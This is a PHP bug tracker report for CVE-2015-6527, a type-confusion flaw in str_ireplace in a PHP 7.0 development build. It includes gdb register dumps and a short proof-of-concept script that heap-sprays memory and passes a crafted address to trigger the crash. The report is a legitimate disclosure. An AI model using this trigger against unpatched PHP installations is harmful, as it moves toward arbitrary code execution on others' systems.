Headline
CVE-2015-6527: PHP :: Bug #70140 :: str_ireplace/php_string_tolower
The php_str_replace_in_subject function in ext/standard/string.c in PHP 7.x before 7.0.0 allows remote attackers to execute arbitrary code via a crafted value in the third argument to the str_ireplace function.
Bug #70140
str_ireplace/php_string_tolower - Arbitrary Code Execution
Submitted:
2015-07-26 14:15 UTC
Modified:
2015-08-23 12:27 UTC
From:
fourny dot d at gmail dot com
Assigned:
laruence (profile)
Status:
Closed
Package:
Strings related
PHP Version:
7.0Git-2015-07-26 (Git)
OS:
x86_64 GNU/Linux
Private report:
No
CVE-ID:
2015-6527
[2015-07-26 14:15 UTC] fourny dot d at gmail dot com
Description:
Hello,
I discovered a vulnerability issue in this PHP version:
$ php --version PHP 7.0.0-dev (cli) (built: Jul 25 2015 11:31:46) (DEBUG) Copyright © 1997-2015 The PHP Group Zend Engine v3.0.0-dev, Copyright © 1998-2015 Zend Technologies
In this new version of PHP, it is possible to control some registers and this could be lead to an arbitrary code execution. The problem is in the function "str_ireplace", the third arguments “$subject” type is not checked. Because of that, we can control the assembly registers.
We can check that in gdb:
Breakpoint 1, 0x00000000008139ff in php_string_tolower (s=0x7fff55e00020) at /home/df0/php-src/ext/standard/string.c:1503 1503 e = c + ZSTR_LEN(s); (gdb) x/10i $rip => 0x8139ff <php_string_tolower+29>: mov rdx,QWORD PTR [rax+0x10] 0x813a03 <php_string_tolower+33>: mov rax,QWORD PTR [rbp-0x18] 0x813a07 <php_string_tolower+37>: add rax,rdx 0x813a0a <php_string_tolower+40>: mov QWORD PTR [rbp-0x20],rax 0x813a0e <php_string_tolower+44>: jmp 0x813af2 <php_string_tolower+272> 0x813a13 <php_string_tolower+49>: call 0x42b2c0 <__ctype_b_loc@plt> 0x813a18 <php_string_tolower+54>: mov rdx,QWORD PTR [rax] 0x813a1b <php_string_tolower+57>: mov rax,QWORD PTR [rbp-0x18] 0x813a1f <php_string_tolower+61>: movzx eax,BYTE PTR [rax] 0x813a22 <php_string_tolower+64>: movzx eax,al (gdb) x/10x $rax 0x7fff55e00020: 0x41414141 0x41414141 0x41414141 0x41414141 0x7fff55e00030: 0x41414141 0x41414141 0x41414141 0x41414141 0x7fff55e00040: 0x41414141 0x41414141 (gdb) ni 0x0000000000813a03 1503 e = c + ZSTR_LEN(s); (gdb) x/x $rdx 0x4141414141414141: Cannot access memory at address 0x4141414141414141
If you have a question, do not hesitate.
Regards, Dimitri Fourny.
Test script:
<?php
// heap spray ini_set("memory_limit", -1); $part = str_repeat("\x41", 4096); $str = str_repeat($part, 10*1024*1024*256/4096);
// the core $a = "string"; str_ireplace($a, $a, 0x7fff55e00020);
?>
Actual result:
Program received signal SIGSEGV, Segmentation fault. 0x00000000008139ff in php_string_tolower (s=0x7fff55e00020) at php-src/ext/standard/string.c:1503
Patches
Add a Patch
Pull Requests
Add a Pull Request
History
AllCommentsChangesGit/SVN commitsRelated reports
[2015-07-27 13:44 UTC] laruence@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: laruence
[2015-07-29 10:37 UTC] fourny dot d at gmail dot com
Thank you. Can you make this bug public please?
Regards, Dimitri Fourny.
[2015-07-29 18:18 UTC] stas@php.net
-Type: Security +Type: Bug